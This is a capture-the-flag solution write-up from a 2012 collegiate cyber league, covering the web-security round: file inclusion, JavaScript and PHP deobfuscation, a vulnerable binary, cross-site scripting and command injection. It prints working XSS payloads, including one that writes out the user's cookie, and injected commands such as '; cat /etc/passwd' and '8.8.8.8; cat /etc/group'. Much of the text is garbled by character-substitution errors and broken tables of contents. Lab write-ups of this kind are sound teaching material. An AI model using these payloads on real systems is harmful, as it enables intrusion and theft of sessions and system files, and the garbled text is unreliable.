Challenge Explanations National Cybei League Fall 2u12
I. Introduct|on
The 2u12 pilot season of the National Cybei League pioviueu collegiate paiticipants with a uigital tiaining giounu to uevelop, uemonstiate, anu test theii cybei secuiity skills in a ieal-woilu, fast-paceu enviionment. Culminating with an inuiviuual "Captuie The Flag" exeicise uevelopeu anu ueliveieu iemotely by ThieatSPACE TN , a uivision of SIuBT Paitneis SN .
The inuiviuual cybei secuiity competition was iun simultaneously in thiee nationally geogiaphic iegions: Eastein, Niu-West, anu Westein. Within each of these iegions thiee competing iounus weie ueliveieu. The fiist focuseu on Web Application Secuiity anu Exploitation, the seconu iounu centeieu aiounu Log Analysis anu Inciuent Response, anu the thiiu anu final 'iegulai season' iounu encompasseu a laige iange of ciyptogiaphy ielateu challenges.
At the conclusion of all thiee iegulai season iounus, the top ten (1u) paiticipants fiom each iegion weie inviteu to compete in a National Final. The finalist woulu be pioviueu access to all pieviously unsolveu challenges as well as a few new puzzles to evenly uistiibute points acioss all thiee high- level pioficiencies.
Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 2 !"#$% '( )'*+%*+, I. Introduct|on ........................................................................................................... 1 II. kound Cne - Web Secur|ty ..................................................................................... 4 A. Flags ........................................................................................................................................................................ 4 B. The Secuie Socket Layei 0iganizational 0nit (SSL 00) .................................................................. S C. Taiget 0ne - Local File Inclusion ............................................................................................................... 6 B. Taiget Two - }avaSciipt 0bfuscation .................................................................................................... 1u E. Taiget Thiee - Seivice Exploitation ...................................................................................................... 1S F. Taiget Foui - Cioss-Site Sciipting .......................................................................................................... 18 !" #$%& ()* """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" +, +" #$%& -./ """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" +, 0" #$%& -12** """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" +! 3" #$%& #/42 """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" +! 5" #$%& #67* """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" +0 u. Taiget Five - Commanu Injection ........................................................................................................... 2S !" #$%& ()* """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" +8 +" #$%& -./ """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" +9 0" #$%& -12** """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" +: 3" #$%& #/42 """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" +; 5" #$%& #67* """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" +; B. Taiget Six - SQL Injection .......................................................................................................................... S1 III. kound 1wo - Log Ana|ys|s .................................................................................... 34 A. Scenaiio .............................................................................................................................................................. S4 B. Flags ..................................................................................................................................................................... SS C. Winuows Secuiity Log ................................................................................................................................. S8 B. Coiiupt Winuows Secuiity Log ............................................................................................................... S8 E. Linux Authentication Log ........................................................................................................................... 4u F. Coiiupt Linux Authentication Log .......................................................................................................... 41 u. Apache Log ........................................................................................................................................................ 42 B. Netwoik Bata Captuie ................................................................................................................................. 4S IV. kound 1hree - Cryptography ................................................................................ 4S A. Scenaiio .............................................................................................................................................................. 4S B. Flags ..................................................................................................................................................................... 46 C. Linux Passwoius ............................................................................................................................................. 48 !" <%=16)& >$&/26?1@= """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 3: +" A2%BC*D E%==./2D= """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 3; B. Winuows Passwoius .................................................................................................................................... Su E. Basic Ciyptogiaphy ....................................................................................................................................... S1 !" A1%$$*)&* ()* """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 5! +" A1%$$*)&* -./ """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 5! 0" A1%$$*)&* -12** """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 5! 3" A1%$$*)&* #/42 """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 5+ 5" A1%$$*)&* #67* """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 5+ 8" A1%$$*)&* F6G """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 50 9" A1%$$*)&* F*7*) """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 50 :" A1%$$*)&* H6&1? """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 53 ;" A1%$$*)&* I6)* """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 53 Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved S !," A1%$$*)&* -*) """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 55 F. Auvanceu Ciyptogiaphy .............................................................................................................................. S6 !" E4JJ$*= ()*K -./K %)D -12** """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 58 +" E4JJ$*= #/42 %)D #67* """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 58 u. Steganogiaphy ................................................................................................................................................ S7 !" #62=? E4JJ$* """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 59 +" F*B/)D E4JJ$* """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 59 0" -162D E4JJ$* """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 5: 3" #/42?1 E4JJ$* """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 5; 5" #6L?1 E4JJ$* """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 5; 8" F6G?1 E4JJ$* """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 8, 9" F*7*)?1 E4JJ$* """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 8! V. NCL Champ|onsh|p ............................................................................................... 6S A. Flags ..................................................................................................................................................................... 6S B. Netwoik Bata Analysis ................................................................................................................................ 66 C. Web Exploitation - Taiget Thiee ............................................................................................................ 67
Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 4 II. kound Cne - Web Secur|ty
In the fiist iounu contestants weie to locate twenty-one (21) flags, founu acioss six (6) taigets. Each taiget was home to a uiffeient web application which focuseu on a specific Web Exploitation skill. A. I|ags Name Server
What is the SSL OU at this address? 54.243.141.68 (Target 1) What is the flag value in this web app? 54.243.141.68 (Target 1) What is the SSL OU at this address? 54.243.157.198 (Target 2) What is the flag value in this web app? 54.243.157.198 (Target 2) What is the SSL OU at this address? 54.243.157.201 (Target 3) Which glibc function is being used insecurely in the binary? 54.243.157.201 (Target 3) What is the SSL OU at this address? 54.243.157.202 (Target 4) What is flag one at this address? 54.243.157.202 (Target 4) What is flag two at this address? 54.243.157.202 (Target 4) What is flag three at this address? 54.243.157.202 (Target 4) What is flag four at this address? 54.243.157.202 (Target 4) What is flag five at this address? 54.243.157.202 (Target 4) What is the SSL OU at this address? 54.243.157.208 (Target 5) What is flag one at this address? 54.243.157.208 (Target 5) What is flag two at this address? 54.243.157.208 (Target 5) What is flag three at this address? 54.243.157.208 (Target 5) What is flag four at this address? 54.243.157.208 (Target 5) What is flag five at this address? 54.243.157.208 (Target 5) What is the SSL OU at this address? 54.242.95.129 (Target 6) What is the password for jsmith at this address? 54.242.95.129 (Target 6) What is the item with ID #6 at this address? 54.242.95.129 (Target 6) Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved S 8. 1he Secure Socket Layer Crgan|zat|ona| Un|t (SSL CU)
Each taiget was accessible ovei BTTPS; as such each taiget hau a unique Secuie Socket Layei (SSL) ceitificate. Within each taiget's ceitificate theie was a flag, founu within the oiganizational unit (00) fielu.
The playei was able to obtain this flag uiiectly thiough the web biowsei, by ieviewing the ceitificate uetails. In fact, because each ceitificate was self-signeu, most biowseis woulu fiist piompt the usei to ieview the ceitificate anu ultimately accept it. Regaiuless of the methou, once the ceitificate infoimation was uisplayeu, the flag coulu be ietiieveu fiom the 00 fielu.
Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 6 C. 1arget Cne - Loca| I||e Inc|us|on
The fiist taiget the playeis woulu encountei uisplayeu nothing moie than a clown, a uiopuown list (containing a list of colois), anu a button labeleu "Change Backgiounu".
0pon selecting a coloi, the contestant shoulu notice two ielevant items. Fiist the backgiounu cleaily changes to the specifieu coloi, anu seconuly the 0RL changes to incluue a 'backgiounu' paiametei. Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 7 This paiametei happens to match the submitteu selection fiom the uiopuown.
https://target-one/?background=Green
It is at this point that the paiticipant will hopefully begin manipulating the paiametei's value via the 0RL. 0ne impoitant clue is that any invaliu entiy sets the backgiounu to white, but uoes not piouuce an eiioi.
https://target-one/?background=FooBar
https://target-one/?background=Black
Coming to the conclusion that only the colois in the list woikeu, one may look foi items at the ioot of the web seivice, nameu that of the valiu colois.
https://target-one/Blue
This woulu iesult in a page containing only the coloi specifieu. Fuithei moie the souice of saiu page woulu ieveal the following BTNL, exclusively.
<body bgcolor=!blue!>
At this point one might concluue that the file being passeu in via the "backgiounu" paiametei is simply being incluueu uiiectly in the base PBP page.
The cuiious woulu now scan the taiget anu notice that in auuition to TCP Poit 8u (BTTP), TCP Poit 21 (FTP) was open. Connecting to this poit woulu ieveal an FTP seivice, which alloweu anonymous login.
220 (vsFTPd 2.3.5) 530 Please login with USER and PASS. Name (target-one:player): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp>
Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 8 Aftei a simple peimission test, the playei woulu leain they have ieau anu wiite access to this FTP seivice. Knowing the system is iunning a Linux uistiibution (obtainable via the pieviously completeu scan) anu the vsFTPu seivice (founu in the FTP welcome message), the contestant shoulu know they aie within the M=27ML?NM4N$/%D= uiiectoiy.
With all of the pieviously gaineu infoimation access to the flag is ielatively easy: the playei can uploau a PBP Sciipt to the FTP seivice, anu then locally incluue it via the "backgiounu" 0RL paiametei.
0nfoitunately this inclusion will not woik. Fuithei testing will ieveal that the inclusion is appenuing ".html" to the enu of the incluueu file. Theiefoie the uploaueu file must enu in ".html" as well.
0ploauing something like the following to a file enuing in ".html" anu incluuing it woulu ieveal the uiiectoiy listing within the web seivices woiking uiiectoiy.
The execution of the above coue woulu have each file 0RL-encoueu anu then piinteu to the page on its own line. This woulu ieveal that the pieviously uiscoveieu file is nameu with foui spaces. Simply piinting the file contents, which can be uone thiough the web biowsei, will get the paiticipant to the next step.
https://target-one/%20%20%20%20
The file contains some infoimation explaining that it, in-anu-of-itself, is not the flag, but the NBS of the piopei stiing is the flag.
This is not the flag, but if you can figure out what it is, get its MD5 and you win!!!
TXlJZGVudGl0eU11c3RBbHdheXNCZVNlY3JldA==
The stiing following the text is BASE64 encoueu; uecouing the stiing ietuins a new stiing.
MyIdentityMustAlwaysBeSecret
Simply taking the above stiing, anu obtaining its NBS is the solution.
19b405425c0d5b506dcfc77caa5b6d68
Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 1u D. 1arget 1wo - IavaScr|pt Cbfuscat|on
The seconu taiget the playeis will encountei piesents them with yet anothei clown, this time accompanieu by a text entiy box anu a Submit button. Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 11
Enteiing text into the text box anu submitting it woulu peifoim a uET iequest to the page, with the enteieu text as the value foi a paiametei labeleu "68aueu8964cuf7SuS4Sc47SS4bSfS772".
The obfuscation is simple to follow; all of the stiings anu function names aie hexauecimally encoueu anu stoieu in the fiist aiiay. Next all vaiiables aie ienameu to a nonsensical stiing of numbeis.
Theie aie numeious iesouices publically available to assist in the piocess of ue-obfuscation. Theie aie two main tasks one shoulu complete: iefoimatting the coue foi bettei ieauability anu uecouing any encoueu uata (such as the functions anu stiings in this puzzle). A gieat public iesouice capable of uoing both of these tasks can be founu at:
http://jsbeautifier.org/
Aftei the paiticipant has obtaineu a moie ieauable copy of the }avaSciipt, they shoulu notice that the O,G!+#!GA }avaSciipt function is being executeu when uata is submitteu thiough the BTNL foim.
The playei shoulu now peifoim some basic ue-obfuscation that woulu show that the initial }avaSciipt function is acting as a Substitution Ciphei between the two chaiactei lists uecoueu fiom the initial Aiiay.
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 12 Next, the initial }avaSciipt function passes the input fiom the foim onto the }avaSciipt function labeleu O,G+8P!GA. This function, amongst othei things, compaies the value passeu in against a value stoieu in the initial aiiay.
0sing a bit of }avaSciipt uebugging with eithei Fiiebug (Fiiefox) oi the Bevelopei Console (Chiome) the playei coulu obtain the conveiteu stiing as well as the mouulus value that O,G!+#!GA is passing to the next function.
var _0x1203x5 = "zYeoXkNtsUgcFuwSrNijBqAZyXvKnPZYfIVErC"; _0x1211xC = _0x1203x5; var _0x1203x6 = _0x55cd[3]; var _0x1203x7 = _0x55cd[4]; var _0x1203x8 = _0x55cd[0]; var _0x1203x9 = 0; var _0x1203xa = 1; while (_0x1203x9 != _0x1203x5[_0x55cd[5]]) { _0x1203x8 += _0x1203x7[_0x55cd[8]](_0x1203x6[_0x55cd[7]](_0x1203x5[_0x55cd[6] ](_0x1203x9, _0x1203xa))); _0x1203x9++; _0x1203xa++; }; var _0x1203xb = _0x1203x5[_0x55cd[5]] % 9; if (_0x1203xb == 0) { _0x1203xb = 3; }; console.log(_0x1203x8); console.log(_0x1203xb);
We now have the piopei values to pass into the seconu }avaSciipt function ,G+8P!GA.
aBvlCpMghFtxUfdHiMrqYjZAbCePmKABuREViX 2 Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 1S Submitting the pieviously obtaineu stiing uoes not change the page's output oi souice coue. So it shoulu be cleai to the playei that O,G+8P!GA uoes something else to the input (fiom the foim). A bit moie }avaSciipt uebugging anu the paiticipant will uiscovei that O,G+8P!GA is shifting the chaiacteis like a Caesai Ciphei.
_0x1203xd = "aBvlCpMghFtxUfdHiMrqYjZAbCePmKABuREViX"; _0x1203xb = 2; _0x2DD1xC = _0x55cd[9]; _0x2EE1xC = _0x55cd[10]; _0x68E7xC = _0x55cd[0]; _0x31F1xC = _0x55cd[0]; _0x1203xb = eval(_0x1203xb); for (i = 0; i < _0x1203xd[_0x55cd[5]]; i++) { let = _0x1203xd[_0x55cd[8]](i); pos = _0x2EE1xC[_0x55cd[7]](let); if (pos >= 0) { _0x68E7xC += _0x2EE1xC[_0x55cd[8]]((pos + _0x1203xb) % 26); } else { _0x68E7xC += let; }; }; for (i = 0; i < _0x68E7xC[_0x55cd[5]]; i++) { let = _0x68E7xC[_0x55cd[8]](i); pos = _0x2DD1xC[_0x55cd[7]](let); if (pos >= 0) { _0x31F1xC += _0x2DD1xC[_0x55cd[8]]((pos + _0x1203xb) % 26); } else { _0x31F1xC += let; }; }; console.log(_0x31F1xC);
The above coue will ieveal the piopeily encoueu veision of the stiing.
cDxnErOijHvzWhfJkOtsAlBCdEgRoMCDwTGXkZ
When the playei enteis the above stiing in the input box anu submits the foim something uiffeient happens. Insteau of setting the inputteu value to the paiametei labeleu "68aueu8964cuf7SuS4Sc47SS4bSfS772" it sets a uiffeient paiametei, SeSfSbSSa2Saf6uaf1ef8eSScS9S681f.
As this taiget piesents no way to intiouuce new oi auuitional coue, the solution must be piesent within the alieauy existing coue. Incluuing the 'inuex.php' file will ieveal the actual PBP coue.
The PBP coue is obfuscateu. Two uistinct sections of the coue aie cleaily encoueu using BASE64. Becouing the fiist PBP vaiiable will uncovei a new set of PBP instiuctions.
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 1S While this coue looks paitially ieauable, anu some of its contents will be familiai to the playei, its still paitially obfuscateu. The seconu poition of the oiiginal PBP coue neeus to be ue-obfuscateu to uncovei the key to ue-obfuscate this new coue.
This seconu section of coue cleaily ieplaces the vowels of the pievious coue block. Reveising this shoulu ieveal the following:
function customError($errno, $errstr) { return 0; } $info = $_GET['5e3f5b33a23af6daf1ef8e35c393681f']; if ( $info == "MarcusMongoFawkesIsDaManWithDaSecretWeapon" ){ echo "<center><font color=\"White\"><h1>Congratz! You beat the Troll!! <br /> The flag is: "; echo md5("DwightIzRoxxStar"); echo "</font></h1></center>";} set_error_handler("customError"); echo file_get_contents($info);
As the playei shoulu now iealize, passing in "NaicusNongoFawkesIsBaNanWithBaSecietWeapon" to the paiametei labeleu "'SeSfSbSSa2Saf6uaf1ef8eSScS9S681f'" will ietuin the flag.
Congratz! You beat the Troll!! The flag is: 1290c8ae9f867dde48f16044b9e18bc1
L. 1arget 1hree - Serv|ce Lxp|o|tat|on
The thiiu challenge pioviueu the playei with nothing moie than a uownloau link. The flag asks which glibc function was being insecuiely useu in the binaiy. Examining the binaiy woulu ieveal that it was a Linux ELF Binaiy.
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, stripped
Fuithei ieview woulu leau the playei to the fact that this binaiy woulu noimally be iunning on a seivei with a flag file anu a key file. The binaiy woulu then take the key file as input fiom the enu-usei Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 16 anu upon ieceiving the piopei key, ietuin the flag. In this exeicise howevei, the goal is to simply finu the vulneiable function call, anu not to weaponize an exploit against the seivice.
A quick listing of the function calls fiom the binaiy will pioviue some piospective canuiuates foi the vulneiable function call.
At this point the contestant shoulu be able to naiiow the list uown to the commonly misuseu functions, iesulting in a much smallei instiuction set to ieveise engineei.
strcpy memset getchar memcpy malloc strcat write
Now the paiticipant shoulu step thiough the piogiam execution in a uebuggei, like IBA Pio, oi the uN0 Bebuggei, paying paiticulai attention to the glibc function calls listeu above.
uiven the fact that ieaulink uoesn't N0LL teiminate stiings, anu that malloc is calleu twice, followeu by a spiintf call, we can see that sensitive memoiy woulu be leakeu in the :,3:SH# subioutine.
So @%$$/B woulu be the piopei answei to the flag question.
Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 17
Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 18 I. 1arget Iour - Cross-S|te Scr|pt|ng
The fouith web exploitation puzzle pioviues the playei with a Seaich Poital foi "Teu's Reseaich Piojects." The page contains a simple text box anu "Seaich" button. The flag list inuicates theie aie five (S) flags foi this challenge.
Enteiing text anu submitting it will iesult in a iequest which assigns the "seaich" paiametei with the value enteieu by the usei. In auuition "iesults" will show in the centei of the scieen.
https://target-four/?search=test&submit=Search
No Result Found For: test
0ne auuitional element that appeais on the page is a link titleu "Seaich Peimalink." A peimalink is a unique 0RL that will peimanently ietuin a usei to a given uynamic page. 0ften founu on seaich ielateu pages, allowing a usei to save the iesults foi latei oi shaie them with otheis.
Clicking on the Peimalink will biing the playei to an iuentical page, content-wise, but the 0RL paiameteis have changeu.
https://target-four/?perma=dGVzdA==
The playei will likely notice that the value of the "peima" is BASE64 encoueu:
echo "dGVzdA==" | base64 -d test
Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 19 Enteiing moie common English teims, such as "the" will actually ietuin ielevant iesults.
https://target-four/?search=the&submit=Search
0ne item the playei shoulu notice is the piesence of theii seaich teim on the page. If the input is not being piopeily sanitizeu this is a cleai inuication of a cioss-site sciipting vulneiability.
A quick test will ieveal that the input is not being piopeily sanitizeu.
https://target-four/?search=<blink>test<%2Fblink>&submit=Search Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 2u Now that the playei has a uecent unueistanuing of the piopei woikingsusage of the inteiface anu an iuea of the vulneiability they shoulu look at the page souice. In uoing so the playei will uncovei a list of flag hints within a set of BTNL comments.
<!-- There are five flags on this XSS vulnerable page --!> <!-- Flag 1: Cause an alert box to popup via a permalinked search URL --!> <!-- Flag 2: Print your cookie to screen via a permalinked search URL --!> <!-- Flag 3: Insert an iframe (linking to a third party) on the page via a permalinked search URL --!> <!-- Flag 4: Send your cookie to a third party server via a permalinked search URL --!> <!-- Flag 5: Change the page heading to read "flag5" (no qoutes) via a permalinked search URL --!>
The iequiiement is to exploit a cioss-site sciipting vulneiability, peifoiming a specific action, anu saving the link via the Peimalink 0RL. This allows the exploitation to be fiist testeu, anu then "saveu" via the peimalink to ietiieve the flag value. 1. I|ag Cne
The fiist task is ielatively easy; the paiticipant simply neeus to popup a }avaSciipt aleit box. As the seaich box is using a simple uET iequest, the playei can eithei entei theii sciipts into the Seaich box, oi they can manipulate the 0RL paiameteis uiiectly.
The following 0RL will cause an aleit with the contents of "test."
At this point clicking on the "Seaich Peimalink" link will ietuin the fiist flag.
1st Flag Is: NCL-ERYT-5346 2. I|ag 1wo
The seconu flag iequiies the cookie to be wiitten to the scieen. 0ne of the simplest }avaSciipt functions is the D/B4@*)?".26?* function. The D/B4@*)?".26?* function allows text, coue, oi vaiiables to be piinteu uiiectly to the page. The following 0RL will piesent the cookie in the uocument wheie the seaich teim is uisplayeu.
Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 21 https://target- four/?search=<script>document.write(document.cookie);</script>&s ubmit=Search
ted_search=beridian+dynamics
A quick click on the "Seaich Peimalink" will ietuin the seconu flag.
2nd Flag Is: NCL-UYSZ-4578 3. I|ag 1hree
The thiiu flag foi this challenge iequiies an 6L2%@* to be auueu to the page, linking to a thiiu-paity site. Again, the playei can use the D/B4@*)?".26?* function to manipulate the page contents. This time the contestant will neeu to wiite out the BTNL coue foi an 6L2%@*.
Again, the playei will neeu to click the "Seaich Peimalink" link to get the flag.
3rd Flag Is: NCL-LJSH-8943
4. I|ag Iour
The fouith flag incieases the complexity of the Peimalink poition. Foi this flag the paiticipant neeus to ieuiiect the biowsei to a new location with the cookie as a paiametei. This is a common exploitation of a cioss-site sciipting vulneiability, iesulting in the attackei obtaining access to youi authenticateu account.
The following 0RL will piopeily senu the cookie to a thiiu- paity, but it will also ieuiiect the biowsei to a new page, making it uifficult to click the "Seaich Peimalink" link. Bowevei, the coiiect value must be submitteu as a Peimalink in oiuei to obtain the flag value.
At this point the playei must go back thiough the pievious challenges to unueistanu how the Peimalink is geneiateu. So fai the only fact known is that the seaicheu value is BASE64 encoueu. If the playei takes a look at the thiiu-flag Peimalink, Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 22 they will uiscovei that moie than simple BASE64 encouing is taking place.
The contestant shoulu notice that all BTNL entities aie actually encoueu. So, simply taking the injecteu coue anu BASE64 encouing it will not woik, insteau the playei must fiist conveit the BTNL entities, anu then BASE64 encoue it.
Beie is the oiiginal sciipt being injecteu to complete the objective foi flag foui:
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 2S Which ietuins the fouith flag foi taiget foui.
4th Flag Is: NCL-EHDF-9623 S. I|ag I|ve
The fifth anu final flag foi taiget foui iequiies the usei to manipulate the page heauing.
Reauing the page souice the playei shoulu notice that one paiticulai element is actually labeleu as the "heauing."
<h1 id="heading">Ted's Research Portal :: Search</h1>
0tilizing the }avaSciipt D/B4@*)?"&*?H$*@*)?STUD function the playei can uiiectly inteiact with this element, anu complete the task of changing the value to "flagS."
The object ietuineu by D/B4@*)?"&*?H$*@*)?STUD allows foi a piopeity, "6))*2<-VW", to be manipulateu which will change the contents of the specifieu BTNL tag.
The above 0RL will iesult in the appiopiiate heauing change, as iequiieu to ietiieve the fifth flag. As always the answei will only be obtaineu once the Peimalink is geneiateu.
Bowevei this time a new iesponse is ietuineu, insteau of the flag value.
FLAG5 XSS DETECTED $ DENIED
Cleaily the web application is uoing some limiteu filteiing, this is akin to an ecommeice application checking foi manipulation of an item piice, insteau of fixing the cioss-site sciipting vulneiability itself.
At this point the playei will neeu to expeiiment with cioss-site sciipting uetection evasion, specifically encouing.
It tuins out that this web application is simply looking foi the value "flagS" being set as the 6))*2<-VW foi the page heauing. Leaving all of the injecteu sciipt intact, anu simply encouing Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 24 the stiing "flagS" (in eithei BTNL oi 0TF-8 encouing schemes) will ietuin the flag.
The flag woulu be ietuineu with eithei of the above Peimalinks.
5th Flag Is: NCL-EFSF-7823 Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 2S G. 1arget I|ve - Command In[ect|on
Foi this puzzle the playei is piesenteu again with a web application, this time a Netwoiking Testing inteiface. The netwoik testing application is pioviuing numeious tools, such as: ping, tiace ioute, BNS lookup, whois, anu configuiation file seaiching.
Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 26 Each of the tools woiks, peifoiming theii iespective actions. The playei shoulu ieview the page's souice coue to finu five (S) BTNL comments pioviuing uiiections on what is iequiieu foi each of the five (S) flags.
<!-- There are five flags on this XSS vulnerable page --!> <!-- Flag 1: Using PING Form, cat /etc/passwd --!> <!-- Flag 2: Using TraceRouter Form, cat /etc/group --!> <!-- Flag 3: Using DNS Lookup Form, cat /etc/motd --!> <!-- Flag 4: Using Whois Form, cat /etc/shells --!> <!-- Flag 5: Using Find Config Files Form, cat /etc/profile --!>
In Linux theie aie a few ways to enu the execution of one commanu anu begin anothei. The pipe is one of the most commonly useu methous to execute numeious commanus on a single line, howevei it specifically takes the output (stuout) fiom the fiist commanu anu enteis it (stuin) into the seconu commanu. Bepenuing on oui goal this may not woik as we uesiie. The two othei methous specifically execute the commanus with inuepenuent options of each othei: the uouble ampeisanu anu the semi-colon. 0sing a uouble ampeisanu the seconu commanu will only execute if the fiist one exits piopeily (no eiiois), anu the semi-colon will iun the seconu commanu iegaiuless.
Nost of the challenge will actually accept any of the above thiee methous, but this wiite-up will usually use the semi-colon, unless otheiwise specifieu. 1. I|ag Cne
The fiist task is to use the ping tool to obtain the M*?BMN%==.D file. The M*?BMN%==.D file contains authentication infoimation foi Linux systems. The uiiections specifically inuicate that the file shoulu be "B%?XD" - B%? oi concatenate is a Linux tool that can be useu to join multiple files togethei, but in the gieat usefulness that aie Linux utilities it uoubles as a tool commonly useu to uump file contents to the scieen, a pipeu commanu, oi file.
Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 27 While using the vaiious tools pioviueu on the page, the playei shoulu come to the conclusion, baseu on the output, that the values they entei aie being passeu into the ielevant Linux commanus foi the given task.
}ust like the cioss-site sciipting vulneiabilities, if the input accepteu fiom the usei is not fiist sanitizeu, the usei coulu inject his oi hei own commanus.
Enteiing the following commanu injection test into the PINu foim inuicates that input is not being sanitizeu anu commanu injection is inueeu possible.
Now the paiticipant simply neeus to inject the commanu they weie pioviueu in the souice coue:
; cat /etc/passwd
Which inueeu ietuins the fiist flag.
1st Flag Is: NCL-TYIA-1682 2. I|ag 1wo
The seconu flag iequiies the contestant to cat the M*?BM&2/4N file fiom the Tiace Route tool. The M*?BM&2/4N file is yet anothei file that contains authentication ielateu infoimation foi Linux.
Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 28 ; cat /etc/group
The pievious commanu uoes not pioviue the flag noi the expecteu output, but insteau an eiioi.
Error: Must enter a valid IP Address
It shoulu now be appaient to the playei that this foim is uoing some limiteu input valiuation.
Pioviuing just any input befoie the semi-colon uoesn't woik, the value must be a valiu IP auuiess.
8.8.8.8; cat /etc/group
Which pioviues the seconu flag:
2nd Flag Is: NCL-MVBC-1354 3. I|ag 1hree
The thiiu flag iequiieu the playei to output the message of the uay file (M*?BM@/?D) thiough the BNS Lookup tool.
